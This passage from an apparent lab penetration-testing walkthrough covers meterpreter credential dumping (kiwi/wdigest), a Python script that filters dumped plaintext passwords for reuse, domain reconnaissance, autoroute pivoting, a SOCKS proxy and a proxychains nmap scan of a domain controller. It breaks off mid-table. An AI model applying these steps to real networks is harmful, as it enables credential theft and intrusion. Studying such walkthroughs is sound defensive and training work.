<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Two caveats. In msf5 the <span lang="EN-US">mimikatz</span> extension is deprecated in favour of <span lang="EN-US">kiwi</span> (<span lang="EN-US">load kiwi</span>, then <span lang="EN-US">creds_wdigest</span>, <span lang="EN-US">creds_tspkg</span> or <span lang="EN-US">creds_all</span>). And WDigest only keeps a plaintext copy of the password in LSASS where it is enabled: it is off by default from Windows 8.1 / Server 2012 R2 onwards, and on older systems with KB2871997 installed it can be switched off by setting <span lang="EN-US">UseLogonCredential</span> to 0 under <span lang="EN-US">HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest</span>. On such a host the Password column stays empty and you fall back to the NTLM hash.</span><span lang="EN-US"></span>
</p>
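<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:8.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">As an added example (not code from the original write-up), the following Python parses the wdigest/tspkg tables above into structured rows and keeps only the credentials worth reusing: it drops rows without a password, the machine account <span lang="EN-US">WEB$</span> and the built-in <span lang="EN-US">LOCAL SERVICE</span> identity, and dedupes the <span lang="EN-US">WEB\Administrator</span> entry that both packages report. The sample text is constructed from the values on this page; the two-or-more-spaces column separation is an assumption about how the table was laid out before extraction flattened it, and the <span lang="EN-US">WEB$</span> password is only the first fragment shown above.</span><span lang="EN-US"></span>
</p>

```python
"""Triage the credential tables that meterpreter's wdigest / tspkg commands print.

Added example for section 4.4; not code from the original write-up. SAMPLE is
constructed from the values shown in the write-up, with columns separated by
two or more spaces (an assumption about the original table layout). The WEB$
value is the first fragment of the machine-account password from the page.
"""
import re

SAMPLE = """\
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;46514   NTLM
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;558301  NTLM       WEB           Administrator  !@#Qwe456
0;996     Negotiate  HACKBOX       WEB$           @tB]xH/ka*ZmmIFokG1qiX#A#_ucF^NfcV9*ry"o$sfC)qN
0;999     Negotiate  HACKBOX       WEB$           @tB]xH/ka*ZmmIFokG1qiX#A#_ucF^NfcV9*ry"o$sfC)qN

tspkg credentials
=================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;996     Negotiate  HACKBOX       WEB$
0;558301  NTLM       WEB           Administrator  !@#Qwe456
"""

COLUMNS = ("authid", "package", "domain", "user", "password")
ROW_RE = re.compile(r"^\d+;\d+\s")          # credential rows start with an AuthID like 0;558301


def parse_creds(text):
    """One dict per credential row; missing trailing columns become empty strings."""
    rows = []
    for line in text.splitlines():
        if not ROW_RE.match(line):
            continue
        # maxsplit=4 keeps any run of spaces inside a long password intact
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=4)
        parts += [""] * (len(COLUMNS) - len(parts))
        rows.append(dict(zip(COLUMNS, parts)))
    return rows


def is_machine_account(row):
    """Computer accounts end in '$' (WEB$)."""
    return row["user"].endswith("$")


def classify(row, hostname):
    """'local' when the Domain column is the host's own NetBIOS name, else 'domain'."""
    return "local" if row["domain"].upper() == hostname.upper() else "domain"


def usable(rows):
    """Rows with a password that belong to a real user, deduped across packages.

    Machine accounts and built-in NT AUTHORITY identities are skipped: their
    'password' is not an interactive logon credential. wdigest and tspkg
    usually describe the same logon session, hence the dedupe.
    """
    seen, out = set(), []
    for r in rows:
        if not r["password"] or is_machine_account(r) or r["domain"] == "NT AUTHORITY":
            continue
        key = (r["domain"].upper(), r["user"].lower(), r["password"])
        if key in seen:
            continue
        seen.add(key)
        out.append(r)
    return out


if __name__ == "__main__":
    for r in usable(parse_creds(SAMPLE)):
        print(f"{classify(r, 'WEB')}: {r['domain']}\\{r['user']} {r['password']}")
```

<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:20.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Running it prints the single surviving credential, <span lang="EN-US">local: WEB\Administrator !@#Qwe456</span>; the classification matters for the next section, because a local account on <span lang="EN-US">WEB</span> cannot be used to query the domain, whereas a <span lang="EN-US">HACKBOX</span> account could.</span><span lang="EN-US"></span>
</p>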
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:19.35pt;margin-left:-.25pt;">
<a name="_Toc21059"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">5.</span></b> Cross-segment domain penetration<span lang="EN-US"></span>
</h1>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.0pt;margin-left:-.25pt;">
<a name="_Toc21060"></a><span lang="EN-US">5.1. </span><span><span style="font-family:黑体;font-weight:normal;">Cross-segment domain penetration with </span><span lang="EN-US">metasploit</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:23.35pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">For the domain penetration stage I use two internal-network tools: </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">metasploit </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">and </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">cobalt strike 4.0</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">.</span><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21061"></a><span lang="EN-US">5.1.1. </span><span><span style="font-family:宋体;font-weight:normal;">Confirm the domain environment</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net config workstation</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:40.8pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="345" src="https://www.2k8.org/content/uploadfile/202203/17/1fb9efc3.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21062"></a><span lang="EN-US">5.1.2. </span><span><span style="font-family:宋体;font-weight:normal;">Locate the domain controller</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.9pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/gather/enum_domain</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:21.5pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="79" src="https://www.2k8.org/content/uploadfile/202203/17/379dd770.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:3.4pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/gather/enum_ad_computers</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:39.85pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="77" src="https://www.2k8.org/content/uploadfile/202203/17/dbc8c4bd.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21063"></a><span lang="EN-US">5.1.3. </span><span><span style="font-family:宋体;font-weight:normal;">Domain information gathering</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net time /domain </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">queries the time from the domain controller; the host that answers is a DC.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net view </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">lists the hosts visible on the network.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.05pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net view /domain </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">lists the domains; the next command lists the hosts of one domain.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net view /domain:hackbox</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:24.65pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="170" src="https://www.2k8.org/content/uploadfile/202203/17/c1b05b55.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Listing the domain groups failed, and so did the other group queries. This is expected here: the session runs as the local <span lang="EN-US">WEB\Administrator</span> account rather than a domain account, so the DC rejects queries such as</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:15.4pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">net group /domain</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ifconfig </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">(the meterpreter command) shows that the host sits in two IP ranges:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">10.10.10.150<br />
192.168.0.150</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">192.168.0.x is the segment the attacker box (192.168.0.127) is on; 10.10.10.x is the internal segment that holds the DC and is reachable only through this dual-homed host.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:20.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="353" src="https://www.2k8.org/content/uploadfile/202203/17/3009135c.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">arp</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:23.1pt;margin-left:1.55pt;margin-right:0cm;margin-top:0cm;">
<img width="468" height="309" src="https://www.2k8.org/content/uploadfile/202203/17/42685ca3.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:11.5pt;margin-left:-.25pt;">
<a name="_Toc21064"></a><span lang="EN-US">5.1.4. </span><span><span style="font-family:宋体;font-weight:normal;">Fixing garbled terminal output</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Output from a Windows <span lang="EN-US">shell</span> opened from the <span lang="EN-US">metasploit</span> console comes back garbled, because a Chinese Windows build uses code page 936 (GBK) while msfconsole expects UTF-8. Switch the cmd session to UTF-8 before running the commands below:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:25.3pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">chcp 65001</span><span lang="EN-US"></span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;line-height:107%;">
<a name="_Toc21065"></a><span lang="EN-US">5.1.5. </span><span><span style="font-family:宋体;font-weight:normal;">Information gathering with shell commands</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ipconfig /all</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:20.75pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="414" src="https://www.2k8.org/content/uploadfile/202203/17/30ce7da5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">DNS server: 10.10.10.149</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The <span lang="EN-US">DNS</span> server is usually the same <span lang="EN-US">IP</span> as the domain controller, because AD-integrated DNS normally runs on the DC itself. That gives the following picture of the internal segment:</span><span lang="EN-US"></span>
</p>
<table border="0" cellpadding="0" cellspacing="0" width="540" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;margin-left:-5.4pt;width:404.85pt;" class="ke-zeroborder">
<tbody>
<tr style="height:16.1pt;">
<td valign="top" width="268" style="border:solid black 1.0pt;height:16.1pt;padding:4.8pt 5.75pt 0cm 5.4pt;width:201.25pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">DC</span><span lang="EN-US"></span>
</p>
</td>
<td valign="top" width="271" style="border:solid black 1.0pt;border-left:none;height:16.1pt;padding:4.8pt 5.75pt 0cm 5.4pt;width:203.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">10.10.10.149</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:16.1pt;">
<td valign="top" width="268" style="border:solid black 1.0pt;border-top:none;height:16.1pt;padding:4.8pt 5.75pt 0cm 5.4pt;width:201.25pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">WEB</span><span lang="EN-US"></span>
</p>
</td>
<td valign="top" width="271" style="border-bottom:solid black 1.0pt;border-left:none;border-right:solid black 1.0pt;border-top:none;height:16.1pt;padding:4.8pt 5.75pt 0cm 5.4pt;width:203.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">10.10.10.150</span><span lang="EN-US"></span>
</p>
</td>
</tr>
</tbody>
</table>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;line-height:107%;">
<a name="_Toc21066"></a><span lang="EN-US">5.1.6. </span><span><span style="font-family:宋体;font-weight:normal;">Retrieve logged-on user information</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:189.8pt;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run post/windows/gather/enum_logged_on_users</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:70.9pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="285" src="https://www.2k8.org/content/uploadfile/202203/17/ca55569b.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21067"></a><span lang="EN-US">5.1.7. </span><span><span style="font-family:宋体;font-weight:normal;">Add a route to reach the </span><span lang="EN-US">DC</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">run autoroute -s 10.10.10.0/24</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">In msf5 <span lang="EN-US">run autoroute</span> is the legacy meterpreter script and prints a deprecation warning; the equivalent post module is <span lang="EN-US">run post/multi/manage/autoroute -s 10.10.10.0/24</span>. Either way the route is tied to this session and disappears if the session dies. Verify it from the <span lang="EN-US">msf5</span> prompt with <span lang="EN-US">route print</span> before starting the proxy.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:41.15pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="115" src="https://www.2k8.org/content/uploadfile/202203/17/376abd01.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h3 style="margin-left:-.25pt;">
<a name="_Toc21068"></a><span lang="EN-US">5.1.8.</span><span><span style="font-family:宋体;font-weight:normal;">Start a SOCKS proxy</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">use auxiliary/server/socks4a</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Once the module is run it listens on the attacker host (SRVPORT 1080 by default). Any tool pointed at that SOCKS port is relayed through the session routes added above, which is how proxychains and nmap reach 10.10.10.0/24 in the next step.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="270" src="https://www.2k8.org/content/uploadfile/202203/17/855a54e1.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"><br clear="all" style="page-break-before:always;" />
</span>
</p>
<h3 style="margin-top:0cm;margin-right:0cm;margin-bottom:.75pt;margin-left:-.25pt;">
<a name="_Toc21069"></a><span lang="EN-US">5.1.9.</span><span><span style="font-family:宋体;font-weight:normal;">Configure </span><span lang="EN-US">proxychains </span></span><span><span style="font-family:宋体;font-weight:normal;">and scan with </span><span lang="EN-US">nmap </span></span><span><span style="font-family:宋体;font-weight:normal;">through the proxy</span></span><span lang="EN-US"></span>
</h3>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:25.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="589" src="https://www.2k8.org/content/uploadfile/202203/17/b3db6441.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">proxychains nmap -sT -A -Pn 10.10.10.149</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">-sT and -Pn are not optional here: a SOCKS proxy can only relay complete TCP connections, so SYN scans, UDP scans and ICMP host discovery never leave the attacker box. The OS-detection part of -A needs raw packets as well and yields nothing through the proxy; version detection and scripts still work. Expect the scan to be slow, since every probe is a full connection over the pivot.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:10.7pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="357" src="https://www.2k8.org/content/uploadfile/202203/17/9abd7965.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Nmap scan report for 10.10.10.149</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Host is up (0.98s latency).</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Not shown: 982 closed ports</span><span lang="EN-US"></span>
</p>
<table border="0" cellpadding="0" cellspacing="0" width="220" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;width:164.65pt;" class="ke-zeroborder">
<tbody>
<tr style="height:12.9pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">PORT</span><span lang="EN-US"></span>
</p>
</td>
<td width="152" colspan="2" valign="top" style="width:113.75pt;padding:0cm 0cm 0cm 0cm;height:12.9pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:5.9pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">STATE SERVICE</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">53/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.1pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">domain</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">88/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.1pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">kerberos-sec</span><span lang="EN-US"></span>
</p>
</td>
</tr>
<tr style="height:15.6pt;">
<td width="68" valign="top" style="width:50.9pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">135/tcp</span><span lang="EN-US"></span>
</p>
</td>
<td width="44" valign="top" style="width:33.1pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:.35pt;margin-right:0cm;margin-top:0cm;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">open</span><span lang="EN-US"></span>
</p>
</td>
<td width="108" valign="top" style="width:80.65pt;padding:0cm 0cm 0cm 0cm;height:15.6pt;">
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.45pt;margin-right:0cm;margin-top:0cm;">
